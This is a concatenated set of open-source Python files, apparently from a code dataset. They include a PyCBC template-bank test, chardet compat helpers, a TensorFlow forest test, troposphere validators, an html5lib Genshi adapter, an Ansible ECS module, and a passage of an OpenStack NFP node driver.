(masses1, masses2, self.metricParams, self.f_upper)
opt_dist = 0.02
while dist > opt_dist * 1.01 or dist < opt_dist * 0.99:
dist_fac = opt_dist / dist
dist_fac = dist_fac**0.5
if dist_fac < 0.01:
dist_fac = 0.01
if dist_fac > 2:
dist_fac = 2
for idx, curr_mass2 in enumerate(masses2):
masses2[idx] = masses1[idx] + \
(curr_mass2 - masses1[idx]) * dist_fac
dist, _, _ = pycbc.tmpltbank.get_point_distance \
(masses1, masses2, self.metricParams, self.f_upper)
self.assertFalse(numpy.isnan(dist))
htilde1, _ = get_fd_waveform\
(approximant='TaylorF2', mass1=masses1[0], mass2=masses1[1],
spin1z=masses1[2], spin2z=masses1[3], delta_f=1.0/256,
f_lower=15, f_final=2000)
htilde2, _ = get_fd_waveform\
(approximant='TaylorF2', mass1=masses2[0], mass2=masses2[1],
spin1z=masses2[2], spin2z=masses2[3], delta_f=1.0/256,
f_lower=15, f_final=2000)
overlap, _ = match(htilde1, htilde2, psd=self.psd_for_match,
low_frequency_cutoff=15)
self.assertTrue(overlap > 0.97 and overlap < 0.985)
def test_chirp_params(self):
chirps=pycbc.tmpltbank.get_chirp_params(2.2, 1.8, 0.2, 0.3,
self.metricParams.f0, self.metricParams.pnOrder)
stockChirps = numpy.loadtxt('%sstockChirps.dat'%(self.dataDir))
diff = (chirps - stockChirps) / stockChirps
errMsg = "Calculated chirp params differ from that expected."
self.assertTrue( not (abs(diff) > 1E-4).any(), msg=errMsg)
def test_hexagonal_placement(self):
arrz = pycbc.tmpltbank.generate_hexagonal_lattice(10, 0, 10, 0, 0.03)
arrz = numpy.array(arrz)
stockGrid = numpy.loadtxt("%sstockHexagonal.dat"%(self.dataDir))
diff = arrz - stockGrid
errMsg = "Calculated lattice differs from that expected."
self.assertTrue( not (diff > 1E-4).any(), msg=errMsg)
def test_anstar_placement(self):
arrz = pycbc.tmpltbank.generate_anstar_3d_lattice(0, 10, 0, 10, 0, \
10, 0.03)
arrz = numpy.array(arrz)
stockGrid = numpy.loadtxt("%sstockAnstar3D.dat"%(self.dataDir))
numpy.savetxt("new_example.dat", arrz)
errMsg = "Calculated lattice differs from that expected."
self.assertTrue(len(arrz) == len(stockGrid), msg=errMsg)
diff = arrz - stockGrid
self.assertTrue( not (diff > 1E-4).any(), msg=errMsg)
def test_get_mass_distribution(self):
# Just run the function, no checking output
pycbc.tmpltbank.get_mass_distribution([1.35,0.239,0.4,-0.2], 2, \
self.massRangeParams, self.metricParams, \
self.f_upper, \
numJumpPoints=123, chirpMassJumpFac=0.0002, \
etaJumpFac=0.009, spin1zJumpFac=0.1, \
spin2zJumpFac=0.2)
def test_get_phys_cov_masses(self):
evecs = self.metricParams.evecs[self.f_upper]
evals = self.metricParams.evals[self.f_upper]
masses1 = [2.2,1.8,0.4,0.3]
masses2 = [2.21,1.79,0.41,0.29]
xis1 = pycbc.tmpltbank.get_cov_params(masses1[0], masses1[1],
masses1[2], masses1[3], self.metricParams, self.f_upper)
xis2 = pycbc.tmpltbank.get_cov_params(masses2[0], masses2[1],
masses2[2], masses2[3], self.metricParams, self.f_upper)
testXis = [xis1[0],xis1[1]]
b_mtot, b_eta = pnutils.mass1_mass2_to_mtotal_eta(masses2[0],
masses2[1])
bestMasses = [b_mtot, b_eta, masses2[2], masses2[3]]
bestXis = xis2
output = pycbc.tmpltbank.get_physical_covaried_masses(testXis, \
bestMasses, bestXis, 0.0001, self.massRangeParams, \
self.metricParams, self.f_upper)
# Test that returned xis are close enough
diff = (output[6][0] - testXis[0])**2
diff += (output[6][1] - testXis[1])**2
errMsg = 'pycbc.tmpltbank.get_physical_covaried_masses '
errMsg += 'failed to find a point within the desired limits.'
self.assertTrue( diff < 1E-4,msg=errMsg)
# Test that returned masses and xis agree
massT = output[0] + output[1]
etaT = output[0]*output[1] / (massT*massT)
spinSetT = pycbc.pnutils.get_beta_sigma_from_aligned_spins(\
etaT, output[2], output[3])
xisT = pycbc.tmpltbank.get_cov_params(output[0], output[1],
output[2], output[3], self.metricParams, self.f_upper)
errMsg = "Recovered xis do not agree with those expected."
self.assertTrue( abs(xisT[0] - output[6][0]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[1] - output[6][1]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[2] - output[6][2]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[3] - output[6][3]) < 1E-5, msg=errMsg)
# Test again with nsbh flag on
output = pycbc.tmpltbank.get_physical_covaried_masses(testXis, \
bestMasses, bestXis, 0.0001, self.massRangeParams2, \
self.metricParams, self.f_upper)
# Test that returned xis are close enough
diff = (output[6][0] - testXis[0])**2
diff += (output[6][1] - testXis[1])**2
errMsg = 'pycbc.tmpltbank.get_physical_covaried_masses '
errMsg += 'failed to find a point within the desired limits.'
self.assertTrue( diff < 1E-4,msg=errMsg)
# Test that returned masses and xis agree
xisT = pycbc.tmpltbank.get_cov_params(output[0], output[1],
output[2], output[3], self.metricParams, self.f_upper)
errMsg = "Recovered xis do not agree with those expected."
self.assertTrue( abs(xisT[0] - output[6][0]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[1] - output[6][1]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[2] - output[6][2]) < 1E-5, msg=errMsg)
self.assertTrue( abs(xisT[3] - output[6][3]) < 1E-5, msg=errMsg)
def test_stack_xi_direction(self):
# Just run the function, no checking output
evecs = self.metricParams.evecs[self.f_upper]
evals = self.metricParams.evals[self.f_upper]
masses1 = [2.2,1.8,0.4,0.3]
masses2 = [2.21,1.79,0.41,0.29]
xis1 = pycbc.tmpltbank.get_cov_params(masses1[0], masses1[1], \
masses1[2], masses1[3], self.metricParams, self.f_upper)
xis2 = pycbc.tmpltbank.get_cov_params(masses2[0], masses2[1], \
masses2[2], masses2[3], self.metricParams, self.f_upper)
testXis = [xis1[0],xis1[1]]
b_mtot, b_eta = pnutils.mass1_mass2_to_mtotal_eta(masses2[0],
masses2[1])
bestMasses = [b_mtot, b_eta, masses2[2], masses2[3]]
bestXis = xis2
depths = pycbc.tmpltbank.stack_xi_direction_brute(testXis, \
bestMasses, bestXis, 3, 0.03, self.massRangeParams, \
self.metricParams, self.f_upper, numIterations=50)
def test_point_distance(self):
masses1 = [2,2,0.4,0.6]
masses2 = [2.02,1.97,0.41,0.59]
dist, xis1, xis2 = pycbc.tmpltbank.get_point_distance(masses1, \
masses2, self.metricParams, self.f_upper)
diff = abs((dist - 23.3681922039) / dist)
errMsg = "Obtained distance does not agree with expected value."
self.assertTrue( diff < 1E-5, msg=errMsg)
def test_conv_to_sngl(self):
# Just run the function, no checking output
masses1 = [(2,2,0.4,0.3),(4.01,0.249,0.41,0.29)]
pycbc.tmpltbank.convert_to_sngl_inspiral_table(masses1, "a")
def test_ethinca_calc(self):
# Just run the function, no checking output
m1 = 2.
m2 = 2.
s1z = 0.
s2z = 0.
# ethinca calc breaks unless f0 = fLow
self.metricParams.f0 = self.metricParams.fLow
output = pycbc.tmpltbank.calculate_ethinca_metric_comps(
self.metricParams, self.ethincaParams, m1, m2, s1z, s2z)
# restore initial f0 value
self.metricParams.f0 = self.f0
def tearDown(self):
pass
suite = unittest.TestSuite()
suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TmpltbankTestClass))
if __name__ == '__main__':
results = unittest.TextTestRunner(verbosity=2).run(suite)
simple_exit(results)
| gpl-3.0 |
d2si-oss/demo-aws-lambda-buffer-api | code/buffer/functions/proxy/vendor/requests/packages/chardet/compat.py | 2943 | 1157 | ######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
# Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
if sys.version_info < (3, 0):
base_str = (str, unicode)
else:
base_str = (bytes, str)
def wrap_ord(a):
if sys.version_info < (3, 0) and isinstance(a, base_str):
return ord(a)
else:
return a
| isc |
ZhangXinNan/tensorflow | tensorflow/contrib/tensor_forest/hybrid/python/models/decisions_to_data_then_nn_test.py | 57 | 4684 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the hybrid tensor forest model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
# pylint: disable=unused-import
from tensorflow.contrib.tensor_forest.hybrid.python.models import decisions_to_data_then_nn
from tensorflow.contrib.tensor_forest.python import tensor_forest
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import test_util
from tensorflow.python.framework.ops import Operation
from tensorflow.python.framework.ops import Tensor
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import googletest
class DecisionsToDataThenNNTest(test_util.TensorFlowTestCase):
def setUp(self):
self.params = tensor_forest.ForestHParams(
num_classes=2,
num_features=31,
layer_size=11,
num_layers=13,
num_trees=17,
connection_probability=0.1,
hybrid_tree_depth=4,
regularization_strength=0.01,
learning_rate=0.01,
regularization="",
weight_init_mean=0.0,
weight_init_std=0.1)
self.params.regression = False
self.params.num_nodes = 2**self.params.hybrid_tree_depth - 1
self.params.num_leaves = 2**(self.params.hybrid_tree_depth - 1)
def testHParams(self):
self.assertEquals(self.params.num_classes, 2)
self.assertEquals(self.params.num_features, 31)
self.assertEquals(self.params.layer_size, 11)
self.assertEquals(self.params.num_layers, 13)
self.assertEquals(self.params.num_trees, 17)
self.assertEquals(self.params.hybrid_tree_depth, 4)
self.assertEquals(self.params.connection_probability, 0.1)
# Building the graphs modifies the params.
with variable_scope.variable_scope("DecisionsToDataThenNNTest_testHParams"):
# pylint: disable=W0612
graph_builder = decisions_to_data_then_nn.DecisionsToDataThenNN(
self.params)
# Tree with depth 4 should have 2**0 + 2**1 + 2**2 + 2**3 = 15 nodes.
self.assertEquals(self.params.num_nodes, 15)
def testConstructionPollution(self):
"""Ensure that graph building doesn't modify the params in a bad way."""
# pylint: disable=W0612
data = [[random.uniform(-1, 1) for i in range(self.params.num_features)]
for _ in range(100)]
self.assertTrue(isinstance(self.params, tensor_forest.ForestHParams))
self.assertFalse(
isinstance(self.params.num_trees, tensor_forest.ForestHParams))
with variable_scope.variable_scope(
"DecisionsToDataThenNNTest_testConstructionPollution"):
graph_builder = decisions_to_data_then_nn.DecisionsToDataThenNN(
self.params)
self.assertTrue(isinstance(self.params, tensor_forest.ForestHParams))
self.assertFalse(
isinstance(self.params.num_trees, tensor_forest.ForestHParams))
def testInferenceConstruction(self):
# pylint: disable=W0612
data = constant_op.constant(
[[random.uniform(-1, 1) for i in range(self.params.num_features)]
for _ in range(100)])
with variable_scope.variable_scope(
"DecisionsToDataThenNNTest_testInferenceConstruction"):
graph_builder = decisions_to_data_then_nn.DecisionsToDataThenNN(
self.params)
graph = graph_builder.inference_graph(data, None)
self.assertTrue(isinstance(graph, Tensor))
def testTrainingConstruction(self):
# pylint: disable=W0612
data = constant_op.constant(
[[random.uniform(-1, 1) for i in range(self.params.num_features)]
for _ in range(100)])
labels = [1 for _ in range(100)]
with variable_scope.variable_scope(
"DecisionsToDataThenNNTest_testTrainingConstruction"):
graph_builder = decisions_to_data_then_nn.DecisionsToDataThenNN(
self.params)
graph = graph_builder.training_graph(data, labels, None)
self.assertTrue(isinstance(graph, Operation))
if __name__ == "__main__":
googletest.main()
| apache-2.0 |
ccortezb/troposphere | troposphere/validators.py | 20 | 1842 | # Copyright (c) 2012-2013, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
def boolean(x):
if x in [True, 1, '1', 'true', 'True']:
return "true"
if x in [False, 0, '0', 'false', 'False']:
return "false"
raise ValueError
def integer(x):
try:
int(x)
except (ValueError, TypeError):
raise ValueError("%r is not a valid integer" % x)
else:
return x
def positive_integer(x):
p = integer(x)
if int(p) < 0:
raise ValueError("%r is not a positive integer" % x)
return x
def integer_range(minimum_val, maximum_val):
def integer_range_checker(x):
i = int(x)
if i < minimum_val or i > maximum_val:
raise ValueError('Integer must be between %d and %d' % (
minimum_val, maximum_val))
return x
return integer_range_checker
def network_port(x):
from . import AWSHelperFn
# Network ports can be Ref items
if isinstance(x, AWSHelperFn):
return x
i = integer(x)
if int(i) < -1 or int(i) > 65535:
raise ValueError("network port %r must been between 0 and 65535" % i)
return x
def s3_bucket_name(b):
from re import compile
s3_bucket_name_re = compile(r'^[a-z\d][a-z\d\.-]{1,61}[a-z\d]$')
if s3_bucket_name_re.match(b):
return b
else:
raise ValueError("%s is not a valid s3 bucket name" % b)
def encoding(encoding):
valid_encodings = ['plain', 'base64']
if encoding not in valid_encodings:
raise ValueError('Encoding needs to be one of %r' % valid_encodings)
return encoding
def status(status):
valid_statuses = ['Active', 'Inactive']
if status not in valid_statuses:
raise ValueError('Status needs to be one of %r' % valid_statuses)
return status
| bsd-2-clause |
burzillibus/RobHome | venv/lib/python2.7/site-packages/html5lib/treeadapters/genshi.py | 356 | 1555 | from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName, Attrs
from genshi.core import START, END, TEXT, COMMENT, DOCTYPE
def to_genshi(walker):
text = []
for token in walker:
type = token["type"]
if type in ("Characters", "SpaceCharacters"):
text.append(token["data"])
elif text:
yield TEXT, "".join(text), (None, -1, -1)
text = []
if type in ("StartTag", "EmptyTag"):
if token["namespace"]:
name = "{%s}%s" % (token["namespace"], token["name"])
else:
name = token["name"]
attrs = Attrs([(QName("{%s}%s" % attr if attr[0] is not None else attr[1]), value)
for attr, value in token["data"].items()])
yield (START, (QName(name), attrs), (None, -1, -1))
if type == "EmptyTag":
type = "EndTag"
if type == "EndTag":
if token["namespace"]:
name = "{%s}%s" % (token["namespace"], token["name"])
else:
name = token["name"]
yield END, QName(name), (None, -1, -1)
elif type == "Comment":
yield COMMENT, token["data"], (None, -1, -1)
elif type == "Doctype":
yield DOCTYPE, (token["name"], token["publicId"],
token["systemId"]), (None, -1, -1)
else:
pass # FIXME: What to do?
if text:
yield TEXT, "".join(text), (None, -1, -1)
| mit |
sidartaoliveira/ansible | lib/ansible/modules/cloud/amazon/ecs_taskdefinition.py | 33 | 16010 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ecs_taskdefinition
short_description: register a task definition in ecs
description:
- Registers or deregisters task definitions in the Amazon Web Services (AWS) EC2 Container Service (ECS)
version_added: "2.0"
author: Mark Chance(@Java1Guy)
requirements: [ json, boto, botocore, boto3 ]
options:
state:
description:
- State whether the task definition should exist or be deleted
required: true
choices: ['present', 'absent']
arn:
description:
- The arn of the task description to delete
required: false
family:
description:
- A Name that would be given to the task definition
required: false
revision:
description:
- A revision number for the task definition
required: False
containers:
description:
- A list of containers definitions
required: False
network_mode:
description:
- The Docker networking mode to use for the containers in the task.
required: false
default: bridge
choices: [ 'bridge', 'host', 'none' ]
version_added: 2.3
task_role_arn:
description:
- The Amazon Resource Name (ARN) of the IAM role that containers in this task can assume. All containers in this task are granted
the permissions that are specified in this role.
required: false
version_added: 2.3
volumes:
description:
- A list of names of volumes to be attached
required: False
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
- name: Create task definition
ecs_taskdefinition:
containers:
- name: simple-app
cpu: 10
essential: true
image: "httpd:2.4"
memory: 300
mountPoints:
- containerPath: /usr/local/apache2/htdocs
sourceVolume: my-vol
portMappings:
- containerPort: 80
hostPort: 80
- name: busybox
command:
- >
/bin/sh -c "while true; do echo '<html><head><title>Amazon ECS Sample App</title></head><body><div><h1>Amazon ECS Sample App</h1><h2>Congratulations!
</h2><p>Your application is now running on a container in Amazon ECS.</p>' > top; /bin/date > date ; echo '</div></body></html>' > bottom;
cat top date bottom > /usr/local/apache2/htdocs/index.html ; sleep 1; done"
cpu: 10
entryPoint:
- sh
- "-c"
essential: false
image: busybox
memory: 200
volumesFrom:
- sourceContainer: simple-app
volumes:
- name: my-vol
family: test-cluster-taskdef
state: present
register: task_output
'''
RETURN = '''
taskdefinition:
description: a reflection of the input parameters
type: dict
returned: always
'''
try:
import boto
import botocore
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
try:
import boto3
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import boto3_conn, camel_dict_to_snake_dict, ec2_argument_spec, get_aws_connection_info
class EcsTaskManager:
"""Handles ECS Tasks"""
def __init__(self, module):
self.module = module
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
if not region:
module.fail_json(msg="Region must be specified as a parameter, in EC2_REGION or AWS_REGION environment variables or in boto configuration file")
self.ecs = boto3_conn(module, conn_type='client', resource='ecs', region=region, endpoint=ec2_url, **aws_connect_kwargs)
except boto.exception.NoAuthHandlerFound as e:
module.fail_json(msg="Can't authorize connection - " % str(e))
def describe_task(self, task_name):
try:
response = self.ecs.describe_task_definition(taskDefinition=task_name)
return response['taskDefinition']
except botocore.exceptions.ClientError:
return None
def register_task(self, family, task_role_arn, network_mode, container_definitions, volumes):
validated_containers = []
# Ensures the number parameters are int as required by boto
for container in container_definitions:
for param in ('memory', 'cpu', 'memoryReservation'):
if param in container:
container[param] = int(container[param])
if 'portMappings' in container:
for port_mapping in container['portMappings']:
for port in ('hostPort', 'containerPort'):
if port in port_mapping:
port_mapping[port] = int(port_mapping[port])
validated_containers.append(container)
try:
response = self.ecs.register_task_definition(family=family,
taskRoleArn=task_role_arn,
networkMode=network_mode,
containerDefinitions=container_definitions,
volumes=volumes)
except botocore.exceptions.ClientError as e:
self.module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
return response['taskDefinition']
def describe_task_definitions(self, family):
data = {
"taskDefinitionArns": [],
"nextToken": None
}
def fetch():
# Boto3 is weird about params passed, so only pass nextToken if we have a value
params = {
'familyPrefix': family
}
if data['nextToken']:
params['nextToken'] = data['nextToken']
result = self.ecs.list_task_definitions(**params)
data['taskDefinitionArns'] += result['taskDefinitionArns']
data['nextToken'] = result.get('nextToken', None)
return data['nextToken'] is not None
# Fetch all the arns, possibly across multiple pages
while fetch():
pass
# Return the full descriptions of the task definitions, sorted ascending by revision
return list(
sorted(
[self.ecs.describe_task_definition(taskDefinition=arn)['taskDefinition'] for arn in data['taskDefinitionArns']],
key=lambda td: td['revision']
)
)
def deregister_task(self, taskArn):
response = self.ecs.deregister_task_definition(taskDefinition=taskArn)
return response['taskDefinition']
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
arn=dict(required=False, type='str'),
family=dict(required=False, type='str'),
revision=dict(required=False, type='int'),
containers=dict(required=False, type='list'),
network_mode=dict(required=False, default='bridge', choices=['bridge', 'host', 'none'], type='str'),
task_role_arn=dict(required=False, default='', type='str'),
volumes=dict(required=False, type='list')))
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
if not HAS_BOTO:
module.fail_json(msg='boto is required.')
if not HAS_BOTO3:
module.fail_json(msg='boto3 is required.')
task_to_describe = None
task_mgr = EcsTaskManager(module)
results = dict(changed=False)
if module.params['state'] == 'present':
if 'containers' not in module.params or not module.params['containers']:
module.fail_json(msg="To use task definitions, a list of containers must be specified")
if 'family' not in module.params or not module.params['family']:
module.fail_json(msg="To use task definitions, a family must be specified")
family = module.params['family']
existing_definitions_in_family = task_mgr.describe_task_definitions(module.params['family'])
if 'revision' in module.params and module.params['revision']:
# The definition specifies revision. We must gurantee that an active revision of that number will result from this.
revision = int(module.params['revision'])
# A revision has been explicitly specified. Attempt to locate a matching revision
tasks_defs_for_revision = [td for td in existing_definitions_in_family if td['revision'] == revision]
existing = tasks_defs_for_revision[0] if len(tasks_defs_for_revision) > 0 else None
if existing and existing['status'] != "ACTIVE":
# We cannot reactivate an inactive revision
module.fail_json(msg="A task in family '%s' already exists for revsion %d, but it is inactive" % (family, revision))
elif not existing:
if not existing_definitions_in_family and revision != 1:
module.fail_json(msg="You have specified a revision of %d but a created revision would be 1" % revision)
elif existing_definitions_in_family and existing_definitions_in_family[-1]['revision'] + 1 != revision:
module.fail_json(msg="You have specified a revision of %d but a created revision would be %d" %
(revision, existing_definitions_in_family[-1]['revision'] + 1))
else:
existing = None
def _right_has_values_of_left(left, right):
# Make sure the values are equivalent for everything left has
for k, v in left.items():
if not ((not v and (k not in right or not right[k])) or (k in right and v == right[k])):
# We don't care about list ordering because ECS can change things
if isinstance(v, list) and k in right:
left_list = v
right_list = right[k] or []
if len(left_list) != len(right_list):
return False
for list_val in left_list:
if list_val not in right_list:
return False
else:
return False
# Make sure right doesn't have anything that left doesn't
for k, v in right.items():
if v and k not in left:
return False
return True
def _task_definition_matches(requested_volumes, requested_containers, existing_task_definition):
if td['status'] != "ACTIVE":
return None
existing_volumes = td.get('volumes', []) or []
if len(requested_volumes) != len(existing_volumes):
# Nope.
return None
if len(requested_volumes) > 0:
for requested_vol in requested_volumes:
found = False
for actual_vol in existing_volumes:
if _right_has_values_of_left(requested_vol, actual_vol):
found = True
break
if not found:
return None
existing_containers = td.get('containerDefinitions', []) or []
if len(requested_containers) != len(existing_containers):
# Nope.
return None
for requested_container in requested_containers:
found = False
for actual_container in existing_containers:
if _right_has_values_of_left(requested_container, actual_container):
found = True
break
if not found:
return None
return existing_task_definition
# No revision explicitly specified. Attempt to find an active, matching revision that has all the properties requested
for td in existing_definitions_in_family:
requested_volumes = module.params.get('volumes', []) or []
requested_containers = module.params.get('containers', []) or []
existing = _task_definition_matches(requested_volumes, requested_containers, td)
if existing:
break
if existing:
# Awesome. Have an existing one. Nothing to do.
results['taskdefinition'] = existing
else:
if not module.check_mode:
# Doesn't exist. create it.
volumes = module.params.get('volumes', []) or []
for container in module.params['containers']:
if 'environment' in container:
for environment in container['environment']:
environment['value'] = str(environment['value'])
results['taskdefinition'] = task_mgr.register_task(module.params['family'],
module.params['task_role_arn'],
module.params['network_mode'],
module.params['containers'],
volumes)
results['changed'] = True
elif module.params['state'] == 'absent':
# When de-registering a task definition, we can specify the ARN OR the family and revision.
if module.params['state'] == 'absent':
if 'arn' in module.params and module.params['arn'] is not None:
task_to_describe = module.params['arn']
elif 'family' in module.params and module.params['family'] is not None and 'revision' in module.params and \
module.params['revision'] is not None:
task_to_describe = module.params['family'] + ":" + str(module.params['revision'])
else:
module.fail_json(msg="To use task definitions, an arn or family and revision must be specified")
existing = task_mgr.describe_task(task_to_describe)
if not existing:
pass
else:
# It exists, so we should delete it and mark changed. Return info about the task definition deleted
results['taskdefinition'] = existing
if 'status' in existing and existing['status'] == "INACTIVE":
results['changed'] = False
else:
if not module.check_mode:
task_mgr.deregister_task(task_to_describe)
results['changed'] = True
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
jiahaoliang/group-based-policy | gbpservice/neutron/services/servicechain/plugins/ncp/node_drivers/nfp_node_driver.py | 1 | 34832 | # Copyright (c) 2016 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import eventlet
from keystoneclient import exceptions as k_exceptions
from keystoneclient.v2_0 import client as keyclient
from neutron._i18n import _LE
from neutron._i18n import _LI
from neutron.common import exceptions as n_exc
from neutron.common import rpc as n_rpc
from neutron.db import model_base
from neutron.plugins.common import constants as pconst
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from oslo_serialization import jsonutils
from oslo_utils import excutils
import sqlalchemy as sa
from sqlalchemy.orm.exc import NoResultFound
from gbpservice.common import utils
from gbpservice.neutron.services.servicechain.plugins.ncp import (
exceptions as exc)
from gbpservice.neutron.services.servicechain.plugins.ncp import driver_base
from gbpservice.neutron.services.servicechain.plugins.ncp import plumber_base
from gbpservice.nfp.common import constants as nfp_constants
from gbpservice.nfp.common import topics as nfp_rpc_topics
NFP_NODE_DRIVER_OPTS = [
cfg.BoolOpt('is_service_admin_owned',
help=_("Parameter to indicate whether the Service VM has to "
"be owned by the Admin"),
default=False),
cfg.IntOpt('service_create_timeout',
default=600,
help=_("Seconds to wait for service creation "
"to complete")),
cfg.IntOpt('service_delete_timeout',
default=120,
help=_("Seconds to wait for service deletion "
"to complete")),
]
cfg.CONF.register_opts(NFP_NODE_DRIVER_OPTS, "nfp_node_driver")
LOG = logging.getLogger(__name__)
class InvalidServiceType(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver only supports the services "
"VPN, Firewall and LB in a Service Chain")
class ServiceProfileRequired(exc.NodeCompositionPluginBadRequest):
message = _("A Service profile is required in Service node")
class NodeVendorMismatch(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver only handles nodes which have service "
"profile with vendor name %(vendor)s")
class DuplicateServiceTypeInChain(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver does not support duplicate "
"service types in same chain")
class RequiredProfileAttributesNotSet(exc.NodeCompositionPluginBadRequest):
message = _("The required attributes in service profile are not present")
class InvalidNodeOrderInChain(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver does not support the order "
"of nodes defined in the current service chain spec")
class UnSupportedServiceProfile(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver does not support this service "
"profile with service type %(service_type)s and vendor "
"%(vendor)s")
class UnSupportedInsertionMode(exc.NodeCompositionPluginBadRequest):
message = _("The NFP Node driver supports only L3 Insertion "
"mode")
class ServiceInfoNotAvailableOnUpdate(n_exc.NeutronException):
message = _("Service information is not available with Service Manager "
"on node update")
class VipNspNotSetonProvider(n_exc.NeutronException):
message = _("Network Service policy for VIP IP address is not configured "
"on the Providing Group")
class NodeInstanceDeleteFailed(n_exc.NeutronException):
message = _("Node instance delete failed in NFP Node driver")
class NodeInstanceCreateFailed(n_exc.NeutronException):
message = _("Node instance create failed in NFP Node driver")
class NodeInstanceUpdateFailed(n_exc.NeutronException):
message = _("Node instance update failed in NFP Node driver")
class ServiceNodeInstanceNetworkFunctionMapping(model_base.BASEV2):
"""ServiceChainInstance to NFP network function mapping."""
__tablename__ = 'ncp_node_instance_network_function_mappings'
sc_instance_id = sa.Column(sa.String(36),
nullable=False, primary_key=True)
sc_node_id = sa.Column(sa.String(36),
nullable=False, primary_key=True)
network_function_id = sa.Column(sa.String(36),
nullable=False, primary_key=True)
# These callback apis are not used today, This is supposed to be used when
# GBP supports asynchronous operations
class NFPCallbackApi(object):
RPC_API_VERSION = "1.0"
target = oslo_messaging.Target(version=RPC_API_VERSION)
def __init__(self, node_driver):
self.node_driver = node_driver
def network_function_created(self, context, network_function):
pass
def network_function_deleted(self, context, network_function):
pass
class NFPClientApi(object):
""" Client side of the NFP Framework user """
RPC_API_VERSION = '1.0'
def __init__(self, topic):
target = oslo_messaging.Target(
topic=topic, version=self.RPC_API_VERSION)
self.client = n_rpc.get_client(target)
def create_network_function(self, context, network_function):
cctxt = self.client.prepare(
fanout=False, topic=nfp_rpc_topics.NFP_NSO_TOPIC)
return cctxt.call(
context,
'create_network_function',
network_function=network_function)
# cctxt.cast(context, 'create_service', service_info=service_info)
def delete_network_function(self, context, network_function_id):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(
context,
'delete_network_function',
network_function_id=network_function_id)
def update_network_function(self, context, network_function_id, config):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(
context,
'update_network_function',
network_function_id=network_function_id,
config=config)
def get_network_function(self, context, network_function_id):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(
context,
'get_network_function',
network_function_id=network_function_id)
def consumer_ptg_added_notification(self, context, network_function_id,
policy_target_group):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(context,
'consumer_ptg_added_notification',
network_function_id=network_function_id,
policy_target_group=policy_target_group)
'''
return cctxt.call(
context,
'consumer_ptg_added_notification',
network_function_id=network_function_id,
policy_target_group=policy_target_group)
'''
def consumer_ptg_removed_notification(self, context, network_function_id,
policy_target_group):
cctxt = self.client.prepare(version=self.RPC_API_VERSION)
return cctxt.call(context,
'consumer_ptg_removed_notification',
network_function_id=network_function_id,
policy_target_group=policy_target_group)
'''
return cctxt.call(
context,
'consumer_ptg_removed_notification',
network_function_id=network_function_id,
policy_target_group=policy_target_group)
'''
